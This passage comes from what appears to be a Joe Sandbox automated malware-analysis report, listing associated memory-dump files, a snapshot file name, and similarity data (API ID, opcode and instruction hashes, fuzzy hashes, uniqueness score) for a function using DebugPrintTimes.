                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: 0$0
                                                                                                • API String ID: 3446177414-203156872
                                                                                                • Opcode ID: ca1b00acd5bcdb1f560b5d7f0dd618af63dc4dd2b1d6e9d519229157f21dbef0
                                                                                                • Instruction ID: 062029a4509013f8783e9c2305a446f71cefe1abc1d6c003b6e701cd6771baae
                                                                                                • Opcode Fuzzy Hash: ca1b00acd5bcdb1f560b5d7f0dd618af63dc4dd2b1d6e9d519229157f21dbef0
                                                                                                • Instruction Fuzzy Hash: CD418CB1A087569FD310CF28C484A1BBBE4BB88314F04492EF988DB351D771E946CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%